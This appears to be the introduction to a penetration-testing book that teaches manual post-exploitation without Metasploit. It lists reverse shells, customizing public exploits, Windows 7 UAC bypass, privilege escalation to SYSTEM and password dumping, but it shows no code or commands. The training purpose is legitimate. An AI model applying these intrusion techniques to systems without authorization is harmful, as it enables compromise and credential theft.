This book acts as an introduction to those who know how to use Metasploit and do not know what happens behind the screens.

If you can’t judge your knowledge level, just see if any of the following questions blows your mind. If yes, this book is for you.

  • How to use publicly available exploits?
  • How to customize those public exploits specific to our needs?
  • How would it be if Metasploit Framework doesn’t exist?
  • How to bypass UAC in Windows 7 without Metasploit?
  • How to escalate standard user/administrator privileges to SYSTEM without “getsystem”?
  • How to upload files to target machines without Meterpreter?
  • How to download files from target machines without Meterpreter?
  • How to dump passwords from target machines without Meterpreter?

There are many tutorials out there on the Internet showing how to use Metasploit and its Meterpreter as exploitation tools for penetration testing. Meterpreter payload is a part of Metasploit Framework, which is often used during post exploitation. This is popular for its capabilities such as escalating privileges from standard or Administrative user to SYSTEM, dumping hashes etc. The best part is that it can be achieved just by running few commands.

Many people do not understand how these techniques are really implemented, which is the crucial part of learning penetration testing. However, most of these techniques are covered here and there, I seldom see a place where all these things are put together to show how we can chain them to perform a successful attack.

This book is an attempt to fill this gap by showing penetration testing concepts without using automated tools such as Metasploit/Meterpreter. We will discuss topics such as gaining reverse shells, searching for publicly available exploits, customizing them according to our needs, escalating privileges, dumping passwords all with just by using a low privileged remote shell. Focus is more towards post exploitation.

Note: The techniques shown here might not be universally the same for other platforms. Nevertheless, the idea here is to show you the methodology that can be followed. This is explained using two specific scenarios.